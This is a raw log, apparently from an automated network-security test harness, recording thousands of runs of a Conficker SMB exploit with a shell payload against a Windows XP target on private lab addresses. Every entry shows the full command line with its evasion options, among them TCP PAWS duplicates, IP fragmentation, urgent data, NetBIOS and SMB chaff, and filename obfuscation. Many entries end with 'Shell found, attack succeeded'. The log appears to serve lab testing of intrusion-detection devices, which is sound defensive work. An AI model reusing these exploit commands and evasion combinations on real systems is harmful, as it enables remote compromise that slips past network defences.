- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62963 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=rk+a46qwtk4 --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_ebcdic","float_ibm","byte3_nonzero","byte4_nonzero" --evasion=[smb_connect,end]tcp_paws,"25%","119368059","random" --verifydelay=1000 --payload=shell
- Info: Using random seed rk+a46qwtk6
- The following evasions are applied from stage smb_connect to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 119368059> and has random bytes as payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - MSRPC NDR flag is modified:
- * EBCDIC character encoding
- * IBM floating point value encoding
- * Reserved 3rd byte is set to a random non-zero value
- * Reserved 4th byte is set to a random non-zero value
- Info: NetBIOS connection 10.62.90.117:62963 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 7600 runs averaging 1.94 runs / second ; progress: 3917/43200......
- 7606 runs averaging 1.94 runs / second ; progress: 3922/43200........
- 7614 runs averaging 1.94 runs / second ; progress: 3927/43200.............
- 7627 runs averaging 1.94 runs / second ; progress: 3932/43200...........
- 7638 runs averaging 1.94 runs / second ; progress: 3937/43200............
- 7650 runs averaging 1.94 runs / second ; progress: 3942/43200...........
- 7661 runs averaging 1.94 runs / second ; progress: 3947/43200........
- 7669 runs averaging 1.94 runs / second ; progress: 3952/43200..
- 7671 runs averaging 1.94 runs / second ; progress: 3957/43200.........
- 7680 runs averaging 1.94 runs / second ; progress: 3962/43200................
- 7696 runs averaging 1.94 runs / second ; progress: 3967/43200..........2015-06-08 00:25:40 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59021 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Z0Kg5SOkUyY --evasion=[smb_connect,end]ipv4_frag,"48" --evasion=[smb_opentree,end]tcp_paws,"5","98447718","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Z0Kg5SOkUyZ
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments with at most 48 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 98447718> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:59021 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 7710 runs averaging 1.94 runs / second ; progress: 3972/43200
- 7710 runs averaging 1.94 runs / second ; progress: 3977/43200Pid 27451 timed out - killed
- 2015-06-08 00:25:50 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31480 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=XOBw9+XbinQ --evasion=[smb_connect,end]netbios_chaff,"3","empty_unspec|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed XOBw9+XbinR
- The following evasions are applied from stage smb_connect to end:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:31480 -> 10.35.1.207:445
- Terminated
- .
- 7712 runs averaging 1.94 runs / second ; progress: 3982/43200.........
- 7721 runs averaging 1.94 runs / second ; progress: 3988/43200..........
- 7731 runs averaging 1.94 runs / second ; progress: 3993/43200.....
- 7736 runs averaging 1.94 runs / second ; progress: 3998/43200............
- 7748 runs averaging 1.94 runs / second ; progress: 4003/43200....................
- 7768 runs averaging 1.94 runs / second ; progress: 4008/43200.............
- 7781 runs averaging 1.94 runs / second ; progress: 4013/43200.......
- 7788 runs averaging 1.94 runs / second ; progress: 4018/43200..........
- 7798 runs averaging 1.94 runs / second ; progress: 4023/43200...................2015-06-08 00:26:37 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35633 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=uj13gaG/tWg --evasion=[start,msrpc_bind]tcp_paws,"21","10082354","shuffle" --evasion=[start,end]tcp_paws,"25%","268435455","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed uj13gaG/tWi
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage start to msrpc_bind:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10082354> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.117:35633 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 7820 runs averaging 1.94 runs / second ; progress: 4028/43200....2015-06-08 00:26:39 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59405 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=kJsTKME6sVk --evasion=[netbios_connect,smb_opentree]tcp_overlap,"1479","new","random_alphanum" --evasion=[smb_connect,msrpc_req]tcp_paws,"25%","7","alphanumrandomized" --evasion=[smb_connect,end]tcp_paws,"50%","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed kJsTKME6sVm
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.112:59405 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 7831 runs averaging 1.94 runs / second ; progress: 4033/432002015-06-08 00:26:43 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18078 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=de5xLhxtOOU --evasion=[smb_openpipe,end]smb_decoytrees,"4","3","1","random_msrpcbind" --evasion=[msrpc_bind,end]smb_seg,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed de5xLhxtOOV
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1 bytes of MSRPC bind-like data.
- The following evasions are applied from stage msrpc_bind to end:
- - SMB writes are segmented to contain at most 7 bytes of payload.
- Info: NetBIOS connection 10.62.90.119:18078 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 7838 runs averaging 1.94 runs / second ; progress: 4038/43200.....
- 7843 runs averaging 1.94 runs / second ; progress: 4043/43200.2015-06-08 00:26:53 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40870 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=SXLFlo5iPRg --evasion=[smb_connect,msrpc_bind]smb_decoytrees,"1","3","5","random_alphanum" --evasion=[smb_openpipe,end]tcp_paws,"75%","8","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed SXLFlo5iPRh
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before normal SMB writes, 1 SMB trees are opened and 3 writes are performed to them. The write payload is 5 random alphanumeric bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.117:40870 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 7856 runs averaging 1.94 runs / second ; progress: 4048/43200...............2015-06-08 00:27:03 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34053 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=Gnk5u9SA84k --evasion=[msrpc_bind,end]smb_decoytrees,"5","5","3","random_msrpcreq" --evasion=[netbios_connect,smb_openpipe]tcp_paws,"25%","171738880","unmodified" --verifydelay=1000 --payload=shell
- Info: Using random seed Gnk5u9SA84k
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.112:34053 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 7872 runs averaging 1.94 runs / second ; progress: 4053/43200.......
- 7879 runs averaging 1.94 runs / second ; progress: 4058/43200.......
- 7886 runs averaging 1.94 runs / second ; progress: 4063/43200.....2015-06-08 00:27:17 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23024 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=QyM7Ixajmbw --evasion=[smb_connect,smb_opentree]smb_chaff,"75%","write_flag","zero" --evasion=[msrpc_bind,end]tcp_paws,"25%","33949496","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed QyM7Ixajmbx
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage msrpc_bind to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33949496> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.119:23024 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 7892 runs averaging 1.94 runs / second ; progress: 4068/43200.....
- 7897 runs averaging 1.94 runs / second ; progress: 4073/43200....
- 7901 runs averaging 1.94 runs / second ; progress: 4078/43200....
- 7905 runs averaging 1.94 runs / second ; progress: 4083/43200
- 7905 runs averaging 1.93 runs / second ; progress: 4088/43200..
- 7907 runs averaging 1.93 runs / second ; progress: 4093/43200....
- 7911 runs averaging 1.93 runs / second ; progress: 4098/43200.....
- 7916 runs averaging 1.93 runs / second ; progress: 4103/43200........
- 7924 runs averaging 1.93 runs / second ; progress: 4108/43200Pid 30195 timed out - killed
- 2015-06-08 00:27:59 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28186 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=n/6DiCvgfXw --evasion=[smb_connect,msrpc_req]ipv4_frag,"80" --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed n/6DiCvgfXy
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - IPv4 fragments with at most 80 bytes per fragment
- Info: NetBIOS connection 10.62.90.111:28186 -> 10.35.1.207:445
- Terminated
- .........
- 7934 runs averaging 1.93 runs / second ; progress: 4113/43200.......Pid 30292 timed out - killed
- 2015-06-08 00:28:06 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49892 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Z7tH6rtzJ0E --evasion=[smb_connect,smb_openpipe]ipv4_opt,"75%","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"9","new","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed Z7tH6rtzJ0F
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP segments are set to overlap by 9 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.118:49892 -> 10.35.1.207:445
- Terminated
- .....
- 7947 runs averaging 1.93 runs / second ; progress: 4118/43200.............
- 7960 runs averaging 1.93 runs / second ; progress: 4123/43200........Pid 30548 timed out - killed
- 2015-06-08 00:28:16 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40982 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4MS2bDmeUFo --evasion=[msrpc_req,end]ipv4_frag,"40" --evasion=[smb_openpipe,end]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 4MS2bDmeUFr
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random urgent data byte to every 1 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - IPv4 fragments with at most 40 bytes per fragment
- Info: NetBIOS connection 10.62.90.114:40982 -> 10.35.1.207:445
- Terminated
- .........
- 7978 runs averaging 1.93 runs / second ; progress: 4128/43200...................
- 7997 runs averaging 1.93 runs / second ; progress: 4133/43200............................
- 8025 runs averaging 1.94 runs / second ; progress: 4138/43200..............
- 8039 runs averaging 1.94 runs / second ; progress: 4143/43200....
- 8043 runs averaging 1.94 runs / second ; progress: 4148/43200........
- 8051 runs averaging 1.94 runs / second ; progress: 4153/43200...............
- 8066 runs averaging 1.94 runs / second ; progress: 4158/43200............
- 8078 runs averaging 1.94 runs / second ; progress: 4163/43200..............
- 8092 runs averaging 1.94 runs / second ; progress: 4168/43200...............
- 8107 runs averaging 1.94 runs / second ; progress: 4173/43200..........
- 8117 runs averaging 1.94 runs / second ; progress: 4178/43200.........
- 8126 runs averaging 1.94 runs / second ; progress: 4183/43200............
- 8138 runs averaging 1.94 runs / second ; progress: 4188/43200..........
- 8148 runs averaging 1.94 runs / second ; progress: 4193/43200....
- 8152 runs averaging 1.94 runs / second ; progress: 4198/43200..Pid 31832 timed out - killed
- 2015-06-08 00:29:31 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57268 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=uLFl/pvqX9E --evasion=[msrpc_req,end]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_connect,smb_openpipe]tcp_paws,"75%","268435455","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed uLFl/pvqX9G
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - The SMB filename is obfuscated:
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.113:57268 -> 10.35.1.207:445
- Terminated
- ..
- 8157 runs averaging 1.94 runs / second ; progress: 4203/43200........
- 8165 runs averaging 1.94 runs / second ; progress: 4208/43200..............
- 8179 runs averaging 1.94 runs / second ; progress: 4213/43200....Pid 32234 timed out - killed
- 2015-06-08 00:29:45 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25299 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=aed0q+Kl1ig --evasion=[start,end]tcp_inittsopt,"enable","zero" --evasion=[smb_opentree,end]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed aed0q+Kl1ih
- - TCP timestamps enabled, initial TCP timestamp is set to normal ( ie. taken from the timestamp clock ).
- The following evasions are applied from stage smb_opentree to end:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.116:25299 -> 10.35.1.207:445
- Terminated
- .....2015-06-08 00:29:47 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47685 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=y67+vnvZhII --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","4","alphanumrandomized" --evasion=[smb_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed y67+vnvZhIL
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.118:47685 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 8196 runs averaging 1.94 runs / second ; progress: 4218/43200...................
- 8215 runs averaging 1.95 runs / second ; progress: 4223/43200...............
- 8230 runs averaging 1.95 runs / second ; progress: 4228/43200.......2015-06-08 00:30:02 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10344 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=36UEqLYSE18 --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","9","random_alpha" --evasion=[msrpc_bind,end]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 36UEqLYSE1/
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:10344 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 2015-06-08 00:30:02 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50948 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=aHMCcAh1EZg --evasion=[smb_connect,smb_openpipe]ipv4_opt,"1","inc","shuffletcp" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","268435455","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed aHMCcAh1EZh
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.114:50948 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 8241 runs averaging 1.95 runs / second ; progress: 4234/43200.2015-06-08 00:30:04 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58105 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=TJu3ax2/y1E --evasion=[smb_connect,smb_openpipe]ipv4_opt,"50%","inc","random_alphanum" --evasion=[msrpc_bind,end]tcp_paws,"1","2","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed TJu3ax2/y1F
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 50% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.114:58105 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .2015-06-08 00:30:07 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51356 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=FeVeSaOFJ/M --evasion=[smb_connect,msrpc_bind]ipv4_opt,"13","inc","random_alpha" --evasion=[netbios_connect,end]tcp_paws,"75%","5","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed FeVeSaOFJ/M
- The following evasions are applied from stage netbios_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has shuffled original payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphabetic bytes as payload
- Info: NetBIOS connection 10.62.90.114:51356 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 8246 runs averaging 1.95 runs / second ; progress: 4239/43200............
- 8258 runs averaging 1.95 runs / second ; progress: 4244/43200......
- 8264 runs averaging 1.95 runs / second ; progress: 4249/43200..........
- 8274 runs averaging 1.95 runs / second ; progress: 4254/43200..
- 8276 runs averaging 1.94 runs / second ; progress: 4259/43200........
- 8284 runs averaging 1.94 runs / second ; progress: 4264/43200.......
- 8291 runs averaging 1.94 runs / second ; progress: 4269/43200.......2015-06-08 00:30:42 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55922 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=1c9Z+P8xUFc --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"5","3","8","random_msrpcbind" --evasion=[smb_openpipe,end]smb_fnameobf,"change_case|add_paths" --verifydelay=1000 --payload=shell
- Info: Using random seed 1c9Z+P8xUFf
- The following evasions are applied from stage smb_openpipe to end:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.116:55922 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 8301 runs averaging 1.94 runs / second ; progress: 4274/43200.....
- 8306 runs averaging 1.94 runs / second ; progress: 4279/43200...........
- 8317 runs averaging 1.94 runs / second ; progress: 4284/43200........
- 8325 runs averaging 1.94 runs / second ; progress: 4289/432002015-06-08 00:30:59 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44164 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=5Lqf8qkQDN4 --evasion=[msrpc_bind,end]netbios_chaff,"50%","empty_keepalive|msrpc_req|broken_length" --evasion=[msrpc_req,end]tcp_paws,"75%","6","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5Lqf8qkQDN7
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_req to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.112:44164 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...2015-06-08 00:31:01 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26976 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=0CPbLvEWtYI --evasion=[start,end]tcp_paws,"1","3","alpharandomized" --evasion=[smb_opentree,end]tcp_paws,"5","159580752","unmodified" --verifydelay=1000 --payload=shell
- Info: Using random seed 0CPbLvEWtYL
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- Info: NetBIOS connection 10.62.90.112:26976 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 8331 runs averaging 1.94 runs / second ; progress: 4294/43200
- 8331 runs averaging 1.94 runs / second ; progress: 4299/43200........
- 8339 runs averaging 1.94 runs / second ; progress: 4304/43200...............
